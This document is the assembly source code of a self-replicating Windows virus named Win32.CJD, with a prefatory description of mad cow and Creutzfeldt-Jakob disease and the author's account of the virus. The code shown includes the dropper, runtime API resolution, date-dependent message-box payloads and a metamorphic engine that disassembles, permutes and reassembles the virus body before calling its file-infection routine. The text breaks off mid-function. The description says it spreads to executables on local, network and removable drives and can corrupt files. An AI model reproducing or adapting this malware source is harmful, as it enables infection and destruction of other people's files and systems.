; CREUTZFELDT-JAKOB DISEASE BioCoded by Neurobasher/Germany
; ---------------------------------------------------------
;
; Index:
; ------
;
; 1 - About the biological version
; 2 - Author's description
; 3 - [WIN32.CJD] source code
;
;
; 1 - About the biological version
; --------------------------------
;
;-----------------------------------------
;What is Bovine Spongiform Encephalopathy?
;-----------------------------------------
;
;BSE is a progressive, fatal neurologic disorder of cattle and is classified as one of the transmissible
;spongiform encephalopathies, a group of diseases of animals and humans believed to be caused by abnormally
;folded proteins called prions. The disease itself has been known since 1920 and is often called 'mad cow disease'.
;BSE was first identified in 1986 in the United Kingdom (UK), where it caused a large outbreak
;among cattle. Although the source of the BSE epizootic agent is uncertain, feeding cattle BSE-contaminated
;meat-and-bone meal is the major contributory factor to the amplification of BSE among cattle. Since 1986,
;BSE cases have been identified in 20 European countries, Japan, Israel, and Canada.
;
;The appearance of the new variant of CJD in several younger-than-average people in Great Britain and France
;has led to concern that BSE may be transmitted to humans through consumption of contaminated beef. Although
;laboratory tests have shown a strong similarity between the prions causing BSE and CJD, there is no direct
;proof to support this theory.
;
;----------------------------------
;What is Creutzfeldt-Jakob Disease?
;----------------------------------
;
;Creutzfeldt-Jakob disease (CJD) is a rare, degenerative, invariably fatal brain disorder.
;Typically, onset of symptoms occurs at about age 60. There are three major categories of CJD:
;sporadic CJD, hereditary CJD, and acquired CJD. There is currently no single diagnostic test for CJD.
;The first concern is to rule out treatable forms of dementia such as encephalitis or chronic meningitis.
;The only way to confirm a diagnosis of CJD is by brain biopsy or autopsy. In a brain biopsy,
;a neurosurgeon removes a small piece of tissue from the patient's brain so that it can be examined
;by a neurologist. Because a correct diagnosis of CJD does not help the patient, a brain biopsy
;is discouraged unless it is needed to rule out a treatable disorder. While CJD can be transmitted to
;other people, the risk of this happening is extremely small.
;
;There is no treatment that can cure or control CJD. Current treatment is aimed at alleviating symptoms
;and making the patient as comfortable as possible. Opiate drugs can help relieve pain, and the drugs
;clonazepam and sodium valproate may help relieve involuntary muscle jerks.
;
;About 90 percent of patients die within 1 year. In the early stages of disease, patients may have
;failing memory, behavioral changes, lack of coordination and visual disturbances. As the illness progresses,
;mental deterioration becomes pronounced and involuntary movements, blindness, weakness of extremities,
;and coma may occur.
;
;The leading scientific theory at this time maintains that CJD is caused by a type of protein called a prion.
;The harmless and the infectious forms of the prion protein are nearly identical, but the infectious form
;takes a different folded shape than the normal protein. Researchers are examining whether the transmissible
;agent is, in fact, a prion and trying to discover factors that influence prion infectivity and how the disorder
;damages the brain. Using rodent models of the disease and brain tissue from autopsies, they are also trying to
;identify factors that influence the susceptibility to the disease and that govern when in life the disease appears.
;
;
; 2 - Author's description
; ------------------------
;
;It is a very complex, parasitic, highly polymorphic Win32 virus that uses the entry-point
;obscuring technique.
;The virus uses a metamorphic engine and permutes its code.
;The virus infects Windows executable files (Win32 PE EXE). When run,
;the virus searches for these files and randomly infects them using different infection schemes.
;The virus searches for Win32 PE executable files in the current directory and five further
;directory levels, and also on the available network and removable media, skipping directories
;whose names begin with "W", and infects them. The virus doesn't infect files whose
;names begin with several suspicious character sequences such as anti*, ...
;or whose name contains the letter 'V', and also skips files depending on a random counter value.
;While infecting files the virus rebuilds and encrypts its body and writes it to one of the
;host file's sections. Then, it searches for and replaces one of the calls to the
;"ExitProcess" function in the host's code section with a call to the viral code.
;Several functions depend on randomness and are also mutated from generation to generation.
;
;Payload
;Depending on the system date, the virus displays various messages.
;There's a really small chance that the virus infects a file more than once.
;Such files are corrupted and won't work anymore.
;
;
; 3 - Win32 source code
; ---------------------
; bugfixed version
; ; To get first generation file use TASM 5.0r ; c:\tasm32 -ml -m9 -q cjdiseae.asm ; c:\tlink32 -Tpe -c -x -aa -r cjdisease.obj,,,import32 ; .386p .model flat locals .code ret .data AddressToFree dd 0 extrn ExitProcess:PROC extrn VirtualAlloc:PROC extrn VirtualFree:PROC extrn GetModuleHandleA:PROC extrn GetProcAddress:PROC extrn MessageBoxA:PROC PreMain proc push 4 push 1000h push 350000h push 0 call VirtualAlloc or eax, eax jz @@Error mov ebp, eax mov [AddressToFree], eax mov ebx, eax mov esi, offset Main mov edi, eax mov ecx, offset EndOfCode sub ecx, offset Main rep movsb ; Copy virus push __DISASM2_SECTION push __DATA_SECTION push __BUFFERS_SECTION push __DISASM_SECTION push __CODE_SECTION mov eax, offset GetProcAddress mov eax, [eax+2] push eax mov eax, offset GetModuleHandleA mov eax, [eax+2] push eax push 5*2 ; Bit 0=0: 'A', 1 call ebx push 0C000h push 0 push dword ptr [AddressToFree] call VirtualFree @@Error: push 0 jmp @@Dropper title: db ' [Win32.CJD] was done by <<>> ',0 body: db ' Creutzfeldt-Jakob Disease ',0ah,0dh db ' rare, degenerative, invariably fatal brain disorder. ',0ah,0dh db ' ------------- ',0ah,0dh db ' [BSE] Bovine Spongiform Encephalopaty ',0ah,0dh db ' well known as mad-cow-disease ',0ah,0dh db ' ',0ah,0dh db ' f i r s t g e n e r a t i o n e x e c u t e d . . . 
',0 @@Dropper: push 0h push offset title push offset body push 0h call MessageBoxA push 0h call ExitProcess PreMain endp __CODE_SECTION EQU 000000h __DISASM_SECTION EQU 100000h __BUFFERS_SECTION EQU 080000h __LABEL_SECTION EQU __BUFFERS_SECTION + 00000h __VARIABLE_SECTION EQU __BUFFERS_SECTION + 10000h __BUFFER1_SECTION EQU __BUFFERS_SECTION + 20000h __BUFFER2_SECTION EQU __BUFFERS_SECTION + 30000h __VAR_MARKS_SECTION EQU __BUFFERS_SECTION + 40000h __DATA_SECTION EQU 0E0000h __DISASM2_SECTION EQU 200000h NumberOfLabels EQU __DATA_SECTION + 0000h NumberOfInstructions EQU __DATA_SECTION + 0008h InstructionTable EQU __DATA_SECTION + 0010h LabelTable EQU __DATA_SECTION + 0018h FutureLabelTable EQU __DATA_SECTION + 0020h PathMarksTable EQU __DATA_SECTION + 0028h NumberOfLabelsPost EQU __DATA_SECTION + 0030h AddressOfLastInstruction EQU __DATA_SECTION + 0038h VariableTable EQU __DATA_SECTION + 0040h NumberOfVariables EQU __DATA_SECTION + 0048h FramesTable EQU __DATA_SECTION + 0050h PermutationResult EQU __DATA_SECTION + 0058h JumpsTable EQU __DATA_SECTION + 0060h AddressOfLastFrame EQU __DATA_SECTION + 0068h PositionOfFirstInstruction EQU __DATA_SECTION + 0070h MODValue EQU __DATA_SECTION + 0078h NumberOfJumps EQU __DATA_SECTION + 0080h RndSeed1 EQU __DATA_SECTION + 0088h RndSeed2 EQU __DATA_SECTION + 0090h ExpansionResult EQU __DATA_SECTION + 0098h Register8Bits EQU __DATA_SECTION + 00A0h Xp_Register0 EQU __DATA_SECTION + 00A8h Xp_Register1 EQU __DATA_SECTION + 00B0h Xp_Register2 EQU __DATA_SECTION + 00B8h Xp_Register3 EQU __DATA_SECTION + 00C0h Xp_Register4 EQU __DATA_SECTION + 00C8h Xp_Register5 EQU __DATA_SECTION + 00D0h Xp_Register6 EQU __DATA_SECTION + 00D8h Xp_Register7 EQU __DATA_SECTION + 00E0h DeltaRegister EQU __DATA_SECTION + 00E8h Xp_8Bits EQU __DATA_SECTION + 00F0h Xp_Operation EQU __DATA_SECTION + 00F8h Xp_Register EQU __DATA_SECTION + 0100h Xp_Mem_Index1 EQU __DATA_SECTION + 0108h Xp_Mem_Index2 EQU __DATA_SECTION + 0110h Xp_Mem_Addition EQU __DATA_SECTION 
+ 0118h Xp_Immediate EQU __DATA_SECTION + 0120h Xp_SrcRegister EQU __DATA_SECTION + 0128h Xp_FlagRegOrMem EQU __DATA_SECTION + 0130h Xp_RecurseLevel EQU __DATA_SECTION + 0138h Xp_LEAAdditionFlag EQU __DATA_SECTION + 0140h VarMarksTable EQU __DATA_SECTION + 0148h _BUFFERS_SECTION EQU __DATA_SECTION + 0150h _CODE_SECTION EQU __DATA_SECTION + 0158h _DISASM_SECTION EQU __DATA_SECTION + 0160h _LABEL_SECTION EQU __DATA_SECTION + 0168h _VARIABLE_SECTION EQU __DATA_SECTION + 0170h _BUFFER1_SECTION EQU __DATA_SECTION + 0178h _BUFFER2_SECTION EQU __DATA_SECTION + 0180h _VAR_MARKS_SECTION EQU __DATA_SECTION + 0188h _DATA_SECTION EQU __DATA_SECTION + 0190h _DISASM2_SECTION EQU __DATA_SECTION + 0198h New_CODE_SECTION EQU __DATA_SECTION + 01A0h New_DISASM_SECTION EQU __DATA_SECTION + 01A8h New_BUFFERS_SECTION EQU __DATA_SECTION + 01B0h ; New_LABEL_SECTION EQU __DATA_SECTION + 01B0h ; New_VARIABLE_SECTION EQU __DATA_SECTION + 01B8h ; New_BUFFER1_SECTION EQU __DATA_SECTION + 01C0h ; New_BUFFER2_SECTION EQU __DATA_SECTION + 01C8h ; New_VAR_MARKS_SECTION EQU __DATA_SECTION + 01D0h New_DATA_SECTION EQU __DATA_SECTION + 01D8h New_DISASM2_SECTION EQU __DATA_SECTION + 01E0h RVA_GetModuleHandle EQU __DATA_SECTION + 01E8h RVA_GetProcAddress EQU __DATA_SECTION + 01F0h FlagAorW EQU __DATA_SECTION + 01F8h ReturnValue EQU __DATA_SECTION + 0200h hKernel EQU __DATA_SECTION + 0208h hUser32 EQU __DATA_SECTION + 0210h RVA_CreateFileA EQU __DATA_SECTION + 0218h RVA_CreateFileMappingA EQU __DATA_SECTION + 0220h RVA_MapViewOfFile EQU __DATA_SECTION + 0228h RVA_UnmapViewOfFile EQU __DATA_SECTION + 0230h RVA_GetFileSize EQU __DATA_SECTION + 0238h RVA_GetFileAttributesA EQU __DATA_SECTION + 0240h RVA_SetFileAttributesA EQU __DATA_SECTION + 0248h RVA_SetFilePointer EQU __DATA_SECTION + 0250h RVA_SetFileTime EQU __DATA_SECTION + 0258h RVA_SetEndOfFile EQU __DATA_SECTION + 0260h RVA_FindFirstFileA EQU __DATA_SECTION + 0268h RVA_FindNextFileA EQU __DATA_SECTION + 0270h RVA_FindClose EQU __DATA_SECTION + 
0278h RVA_CloseHandle EQU __DATA_SECTION + 0280h RVA_MessageBoxA EQU __DATA_SECTION + 0288h NewLabelTable EQU __DATA_SECTION + 0290h Asm_ByteToSort EQU __DATA_SECTION + 0298h JumpRelocationTable EQU __DATA_SECTION + 02A0h NumberOfJumpRelocations EQU __DATA_SECTION + 02A8h Permut_LastInstruction EQU __DATA_SECTION + 02B0h TranslatedDeltaRegister EQU __DATA_SECTION + 02B8h hFile EQU __DATA_SECTION + 02C0h FileSize EQU __DATA_SECTION + 02C8h OriginalFileSize EQU __DATA_SECTION + 02D0h hMapping EQU __DATA_SECTION + 02D8h MappingAddress EQU __DATA_SECTION + 02E0h HeaderAddress EQU __DATA_SECTION + 02E8h StartOfSectionHeaders EQU __DATA_SECTION + 02F0h RelocHeader EQU __DATA_SECTION + 02F8h TextHeader EQU __DATA_SECTION + 0300h DataHeader EQU __DATA_SECTION + 0308h RVA_TextHole EQU __DATA_SECTION + 0310h Phys_TextHole EQU __DATA_SECTION + 0318h TextHoleSize EQU __DATA_SECTION + 0320h RVA_DataHole EQU __DATA_SECTION + 0328h Phys_DataHole EQU __DATA_SECTION + 0330h MakingFirstHole EQU __DATA_SECTION + 0338h ExitProcessAddress EQU __DATA_SECTION + 0340h GetModuleHandleAddress EQU __DATA_SECTION + 0348h GetProcAddressAddress EQU __DATA_SECTION + 0350h VirtualAllocAddress EQU __DATA_SECTION + 0358h GetModuleHandleMode EQU __DATA_SECTION + 0360h VirtualPositionOfVar EQU __DATA_SECTION + 0368h PhysicalPositionOfVar EQU __DATA_SECTION + 0370h Kernel32Imports EQU __DATA_SECTION + 0378h hFindFile EQU __DATA_SECTION + 0380h Addr_FilePath EQU __DATA_SECTION + 0388h FileAttributes EQU __DATA_SECTION + 0390h SizeOfNewCode EQU __DATA_SECTION + 0398h FindFileData EQU __DATA_SECTION + 03A0h OtherBuffers EQU __DATA_SECTION + 03A8h RoundedSizeOfNewCode EQU __DATA_SECTION + 03B0h NewAssembledCode EQU __DATA_SECTION + 03B8h NumberOfUndoActions EQU __DATA_SECTION + 03C0h LastHeader EQU __DATA_SECTION + 03C8h MaxSizeOfDecryptor EQU __DATA_SECTION + 03D0h CreatingADecryptor EQU __DATA_SECTION + 03D8h DecryptorPseudoCode EQU __DATA_SECTION + 03E0h AssembledDecryptor EQU __DATA_SECTION + 03E8h 
Decryptor_DATA_SECTION EQU __DATA_SECTION + 03F0h SizeOfExpansion EQU __DATA_SECTION + 03F8h SizeOfDecryptor EQU __DATA_SECTION + 0400h TypeOfEncryption EQU __DATA_SECTION + 0408h EncryptionKey EQU __DATA_SECTION + 0410h IndexValue EQU __DATA_SECTION + 0418h IndexRegister EQU __DATA_SECTION + 0420h BufferRegister EQU __DATA_SECTION + 0428h CounterRegister EQU __DATA_SECTION + 0430h BufferValue EQU __DATA_SECTION + 0438h CounterValue EQU __DATA_SECTION + 0440h Poly_FirstPartOfFunction EQU __DATA_SECTION + 0448h Poly_SecondPartOfFunction EQU __DATA_SECTION + 0450h Poly_ThirdPartOfFunction EQU __DATA_SECTION + 0458h AdditionToBuffer EQU __DATA_SECTION + 0460h Poly_Jump_ErrorInVirtualAlloc EQU __DATA_SECTION+0468h ;Index2Register EQU __DATA_SECTION + 0470h Poly_LoopLabel EQU __DATA_SECTION + 0478h RVA_GetSystemTime EQU __DATA_SECTION + 0480h RVA_GetTickCount EQU __DATA_SECTION + 0488h RVA_GetDriveTypeA EQU __DATA_SECTION + 0490h RVA_GetLogicalDriveStringsA EQU __DATA_SECTION + 0498h RVA_SetCurrentDirectoryA EQU __DATA_SECTION + 04A0h StartOfEncryptedData EQU __DATA_SECTION + 04A8h SizeOfNewCodeP2 EQU __DATA_SECTION + 04B0h Poly_InitialValue EQU __DATA_SECTION + 04B8h Poly_Addition EQU __DATA_SECTION + 04C0h Poly_ExcessJumpInstruction EQU __DATA_SECTION + 04C8h DirectoryDeepness EQU __DATA_SECTION + 04D0h RVA_GetSystemDefaultLCID EQU __DATA_SECTION + 04D8h Poly_JumpRandomExecution EQU __DATA_SECTION + 04E0h Main proc ; EBP = Delta offset pop ebx pop eax mov ecx, eax and eax, 1 mov [ebp+FlagAorW], eax and ecx, 0FFFFFFFEh shr ecx, 1 mov [ebp+DeltaRegister], ecx pop eax mov eax, [eax] mov [ebp+RVA_GetModuleHandle], eax pop eax mov eax, [eax] mov [ebp+RVA_GetProcAddress], eax pop eax and eax, 03FFFFFh mov [ebp+_CODE_SECTION], eax pop eax and eax, 03FFFFFh mov [ebp+_DISASM_SECTION], eax pop eax and eax, 03FFFFFh mov [ebp+_BUFFERS_SECTION], eax mov [ebp+_LABEL_SECTION], eax add eax, 10000h mov [ebp+_VARIABLE_SECTION], eax add eax, 10000h mov [ebp+_BUFFER1_SECTION], eax add 
eax, 10000h mov [ebp+_BUFFER2_SECTION], eax add eax, 10000h mov [ebp+_VAR_MARKS_SECTION], eax pop eax and eax, 03FFFFFh mov [ebp+_DATA_SECTION], eax pop eax and eax, 03FFFFFh mov [ebp+_DISASM2_SECTION], eax push ebx ; Restore return value mov edx, [ebp+_BUFFER1_SECTION] add edx, ebp push eax push ecx push edx ; APICALL_BEGIN mov eax, 'nrek' mov [edx], eax mov eax, '23le' mov [edx+4], eax mov eax, 'lld.' mov [edx+8], eax xor eax, eax mov [edx+0Ch], eax call APICall_GetModuleHandle pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error mov [ebp+hKernel], eax push eax push ecx push edx mov eax, 'resu' mov [edx], eax mov eax, 'd.23' mov [edx+4], eax mov eax, 'll' mov [edx+8], eax call APICall_GetModuleHandle pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] mov [ebp+hUser32], eax mov edx, [ebp+_BUFFER1_SECTION] add edx, ebp mov edi, [ebp+hKernel] mov eax, 'aerC' mov [edx], eax mov eax, 'iFet' mov [edx+4], eax mov eax, 'Ael' mov [edx+8], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_CreateFileA], eax mov eax, 'ppaM' mov [edx+0Ah], eax mov eax, 'Agni' mov [edx+0Eh], eax xor eax, eax mov [edx+12h], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_CreateFileMappingA], eax add edx, 2 mov eax, 'VpaM' mov [edx], eax mov eax, 'Owei' mov [edx+4], eax mov eax, 'liFf' mov [edx+8], eax mov eax, 'e' mov [edx+0Ch], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_MapViewOfFile], eax sub edx, 2 mov eax, 'amnU' mov [edx], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_UnmapViewOfFile], eax mov eax, 'SteG' mov [edx], eax mov eax, 'etsy' mov [edx+4], eax mov eax, 'miTm' mov [edx+8], eax mov eax, 'e' mov [edx+0Ch], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetSystemTime], eax mov eax, 'virD' mov [edx+3], eax mov eax, 'pyTe' mov [edx+7], eax mov eax, 'Ae' mov [edx+0Bh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetDriveTypeA], eax mov eax, 'igoL' mov [edx+3], eax mov eax, 'Dlac' mov [edx+7], eax mov 
eax, 'evir' mov [edx+0Bh], eax mov eax, 'irtS' mov [edx+0Fh], eax mov eax, 'Asgn' mov [edx+13h], eax xor eax, eax mov [edx+17h], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetLogicalDriveStringsA], eax mov eax, 'tsyS' mov [edx+3], eax mov eax, 'eDme' mov [edx+7], eax mov eax, 'luaf' mov [edx+0Bh], eax mov eax, 'ICLt' mov [edx+0Fh], eax mov eax, 'D' mov [edx+13h], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetSystemDefaultLCID], eax mov eax, 'CteS' mov [edx], eax mov eax, 'erru' mov [edx+4], eax mov eax, 'iDtn' mov [edx+8], eax mov eax, 'tcer' mov [edx+0Ch], eax mov eax, 'Ayro' mov [edx+10h], eax xor eax, eax mov [edx+14h], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetCurrentDirectoryA], eax mov eax, 'FteG' mov [edx], eax mov eax, 'Seli' mov [edx+4], eax mov eax, 'ezi' mov [edx+8], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetFileSize], eax mov eax, 'rttA' mov [edx+7], eax mov eax, 'tubi' mov [edx+0Bh], eax mov eax, 'Ase' mov [edx+0Fh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_GetFileAttributesA], eax mov eax, 'FteS' mov [edx], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetFileAttributesA], eax mov eax, 'nioP' mov [edx+7], eax mov eax, 'ret' mov [edx+0Bh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetFilePointer], eax mov eax, 'emiT' mov [edx+7], eax xor eax, eax mov [edx+0Bh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetFileTime], eax mov eax, 'OdnE' mov [edx+3], eax mov eax, 'liFf' mov [edx+7], eax mov eax, 'e' mov [edx+0Bh], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_SetEndOfFile], eax mov eax, 'dniF' mov [edx], eax mov eax, 'sriF' mov [edx+4], eax mov eax, 'liFt' mov [edx+8], eax mov eax, 'Ae' mov [edx+0Ch], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_FindFirstFileA], eax mov eax, 'txeN' mov [edx+4], eax mov eax, 'eliF' mov [edx+8], eax mov eax, 'A' mov [edx+0Ch], eax call GetFunction or eax, eax jz @@Error mov 
[ebp+RVA_FindNextFileA], eax mov eax, 'solC' mov [edx+4], eax mov eax, 'e' mov [edx+8], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_FindClose], eax add edx, 4 mov eax, 'dnaH' mov [edx+5], eax mov eax, 'el' mov [edx+9], eax call GetFunction or eax, eax jz @@Error mov [ebp+RVA_CloseHandle], eax sub edx, 4 mov edi, [ebp+hUser32] mov eax, 'sseM' mov [edx], eax mov eax, 'Bega' mov [edx+4], eax mov eax, 'Axo' mov [edx+8], eax call GetFunction mov [ebp+RVA_MessageBoxA], eax push eax push ecx push edx mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp push eax call dword ptr [ebp+RVA_GetSystemTime] pop edx pop ecx pop eax mov ebx, [ebp+_BUFFER1_SECTION] add ebx, ebp mov eax, [ebx+04h] add eax, [ebx+0Ch] mov [ebp+RndSeed1], eax add eax, [ebx+08h] mov [ebp+RndSeed2], eax mov eax, [ebp+RVA_MessageBoxA] or eax, eax jz @@NoPayload ;; Simple, silly MessageBox with a partly metamorphic message :) mov edx, [ebp+_BUFFER1_SECTION] add edx, ebp mov eax, [edx+2] and eax, 0FFh @@ChoosePayload: call Random and eax, 3 cmp eax, 1 je @@CheckPayload cmp eax, 2 je @@CheckPayload2 cmp eax, 3 je @@CheckPayload3 cmp eax, 0 je @@EndPayload @@CheckPayload: call Random and eax, 03Fh jnz @@EndPayload push edx call Random and eax, 00000000h add eax, 'DJC[' ;; "[CJD" mov [edx], eax add edx, 4 call Random and eax, 20200000h add eax, 'RC ]' ;; "] CR" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'ZTUE' ;; "EUTZ" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'DLEF' ;; "FELD" mov [edx], eax add edx, 4 call Random and eax, 20200020h add eax, 'AJ-T' ;; "T-JA" mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' BOK' ;; "KOB " mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'ESID' ;; "DISE" mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' ESA' ;; "ASE " mov [edx], eax call Random and eax, 2 jnz @@TruncatePayload add edx, 4 call Random and eax, 00000000h add eax, ' )c(' ;; " (c)" mov [edx], eax add edx, 4 call 
Random and eax, 00000000h add eax, 'N yb' ;; "by N" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'orue' ;; "euro" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'hsab' ;; "bash" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'G/re' ;; "er/G" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, 'amre' ;; "erma" mov [edx], eax add edx, 4 call Random and eax, 00000000h add eax, ' yn' ;; "ny " mov [edx], eax @@TruncatePayload: pop edx ; "[CJD] Creutzfeldt-Jakob Disease" ; and sometimes "by Neurobasher/Germany" push eax ; first part with random upcases and lowcases. push ecx push edx xor eax, eax push eax mov eax, edx push eax push eax xor eax, eax push eax call dword ptr [ebp+RVA_MessageBoxA] pop edx pop ecx pop eax jmp @@EndPayload @@CheckPayload2: call Random and eax, 1FFh jnz @@CheckPayload3 push edx xor eax, eax call Random and eax, 20202020h add eax, 'IVOB' ;; "BOVI" mov [edx], eax add edx, 4 call Random and eax, 20002020h add eax, 'S EN' ;; "NE S" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'GNOP' ;; "PONG" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'ROFI' ;; "IFOR" mov [edx], eax add edx, 4 call Random and eax, 20002020h add eax, 'NE M' ;; "M EN" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'HPEC' ;; "CEPH" mov [edx], eax add edx, 4 call Random and eax, 20202020h add eax, 'POLA' ;; "ALOP" mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' YTA' ;; "ATY " mov [edx], eax pop edx push eax push ecx push edx xor eax, eax push eax mov eax, edx push eax push eax xor eax, eax push eax call dword ptr [ebp+RVA_MessageBoxA] pop edx pop ecx pop eax @@CheckPayload3: call Random and eax, 1FFh jnz @@EndPayload push edx xor eax, eax call Random and eax, 00202020h add eax, ' DAM' ;; "MAD " mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' WOC' ;; "COW " mov [edx], eax add edx, 4 call Random and eax, 20202020h 
add eax, 'ESID' ;; "DISE" mov [edx], eax add edx, 4 call Random and eax, 00202020h add eax, ' ESA' ;; "ASE " mov [edx], eax pop edx push eax push ecx push edx xor eax, eax push eax mov eax, edx push eax push eax xor eax, eax push eax call dword ptr [ebp+RVA_MessageBoxA] pop edx pop ecx pop eax @@EndPayload: @@NoPayload: mov esi, [ebp+_DISASM_SECTION] add esi, ebp xor eax, eax push esi @@LoopGarbleSect_01: mov ebx, eax add eax, 1 mov ecx, eax add eax, 1 mov edx, eax add eax, 1 push eax call Xp_GarbleRegisters pop eax mov [esi], ebx mov [esi+4], ecx mov [esi+8], edx add esi, 0Ch cmp eax, 6 jnz @@LoopGarbleSect_01 pop esi push esi mov ecx, 2 @@LoopGarbleSect_02: push ecx mov ebx, [esi] mov ecx, [esi+08h] mov edx, [esi+10h] call Xp_GarbleRegisters mov [esi], ebx mov [esi+08h], ecx mov [esi+10h], edx pop ecx add esi, 4 sub ecx, 1 or ecx, ecx jnz @@LoopGarbleSect_02 pop esi mov ecx, 6 xor edx, edx @@LoopGarbleSect_03: call Random and eax, 7FFFh add edx, eax mov eax, [esi] or eax, eax jz @@GarbleSect_CodeSection cmp eax, 1 jz @@GarbleSect_DisasmSection cmp eax, 2 jz @@GarbleSect_BuffersSection cmp eax, 3 jz @@GarbleSect_DataSection cmp eax, 4 jnz @@GarbleSect_Next @@GarbleSect_Disasm2Section: mov [ebp+New_DISASM2_SECTION], edx add edx, 100000h jmp @@GarbleSect_Next @@GarbleSect_CodeSection: mov [ebp+New_CODE_SECTION], edx add edx, 80000h jmp @@GarbleSect_Next @@GarbleSect_DisasmSection: mov [ebp+New_DISASM_SECTION], edx add edx, 100000h jmp @@GarbleSect_Next @@GarbleSect_BuffersSection: mov [ebp+New_BUFFERS_SECTION], edx add edx, 60000h jmp @@GarbleSect_Next @@GarbleSect_DataSection: mov [ebp+New_DATA_SECTION], edx add edx, 20000h @@GarbleSect_Next: add esi, 4 sub ecx, 1 or ecx, ecx jnz @@LoopGarbleSect_03 mov eax, [ebp+_DISASM_SECTION] add eax, ebp mov [ebp+InstructionTable], eax mov eax, [ebp+_LABEL_SECTION] add eax, ebp mov [ebp+LabelTable], eax mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp mov [ebp+FutureLabelTable], eax mov eax, [ebp+_DISASM2_SECTION] add eax, ebp mov 
[ebp+PathMarksTable], eax mov esi, [ebp+_CODE_SECTION] add esi, ebp call DisasmCode nop mov [ebp+AddressOfLastInstruction], edi call ShrinkCode mov eax, [ebp+_VARIABLE_SECTION] add eax, ebp mov [ebp+VariableTable], eax mov eax, [ebp+_VAR_MARKS_SECTION] add eax, ebp mov [ebp+VarMarksTable], eax mov ecx, [ebp+DeltaRegister] call IdentifyVariables mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp mov [ebp+FramesTable], eax mov eax, [ebp+_DISASM2_SECTION] add eax, ebp mov [ebp+PermutationResult], eax mov eax, [ebp+_BUFFER2_SECTION] add eax, ebp mov [ebp+JumpsTable], eax call PermutateCode mov eax, [ebp+PermutationResult] mov [ebp+InstructionTable], eax xor eax, eax mov [ebp+CreatingADecryptor], eax mov eax, [ebp+_DISASM_SECTION] add eax, ebp mov [ebp+ExpansionResult], eax xor eax, eax mov [ebp+SizeOfExpansion], eax call XpandCode mov eax, [ebp+ExpansionResult] mov [ebp+InstructionTable], eax mov eax, [ebp+_DISASM2_SECTION] add eax, ebp mov [ebp+NewAssembledCode], eax mov eax, [ebp+_VARIABLE_SECTION] add eax, ebp mov [ebp+NewLabelTable], eax mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp mov [ebp+JumpRelocationTable], eax call AssembleCode mov eax, [ebp+_DISASM_SECTION] add eax, ebp mov [ebp+DecryptorPseudoCode], eax add eax, 80000h mov [ebp+AssembledDecryptor], eax mov eax, [ebp+_BUFFER2_SECTION] add eax, ebp mov [ebp+FindFileData], eax mov eax, [ebp+_BUFFER1_SECTION] add eax, ebp mov [ebp+OtherBuffers], eax call InfectFiles @@Error: ret Main endp ;---------------------------------------------------------------------------------------- IdentifyVariables proc mov esi, [ebp+InstructionTable] mov edi, [ebp+VariableTable] xor eax, eax mov [ebp+NumberOfVariables], eax @@LoopGetVar: xor eax, eax mov al, [esi] cmp eax, 0FCh jz @@NextInstruction call CheckIfInstructionUsesMem or eax, eax jz @@NextInstruction mov al, [esi+1] cmp eax, ecx jz @@DeltaOffsetAt1 mov al, [esi+2] cmp eax, ecx jz @@DeltaOffsetAt2 @@NextInstruction: add esi, 10h cmp esi, [ebp+AddressOfLastInstruction] jnz 
@@LoopGetVar jmp @@SelectNewVariables @@DeltaOffsetAt1: mov al, [esi+2] jmp @@Continue_01 @@DeltaOffsetAt2: mov al, [esi+1] @@Continue_01: cmp eax, 8 jnz @@NextInstruction mov eax, [esi+3] mov edx, [ebp+VariableTable] mov ebx, [ebp+NumberOfVariables] sub eax, [ebp+_DATA_SECTION] and eax, 0FFFFFFF8h @@LookForVariable: or ebx, ebx jz @@InsertVariable cmp eax, [edx] jz @@VariableExists add edx, 4 sub ebx, 4 jmp @@LookForVariable @@InsertVariable: mov [edx], eax mov eax, [ebp+NumberOfVariables] add eax, 4 mov [ebp+NumberOfVariables], eax @@VariableExists: mov eax, 00000809h mov [esi+1], eax mov [esi+3], edx jmp @@NextInstruction @@SelectNewVariables: mov ecx, 20000h / 4 mov edi, [ebp+VarMarksTable] xor eax, eax @@LoopInitializeMarks: mov [edi], eax add edi, 4 sub ecx, 1 or ecx, ecx jnz @@LoopInitializeMarks mov ecx, [ebp+NumberOfVariables] mov ebx, [ebp+VariableTable] @@LoopGetNewVar: call Random and eax, 01FFF8h add eax, [ebp+VarMarksTable] mov edx, [eax] or edx, edx jnz @@LoopGetNewVar mov edx, 1 mov [eax], edx sub eax, [ebp+VarMarksTable] push ebx mov ebx, eax call Random and eax, 3 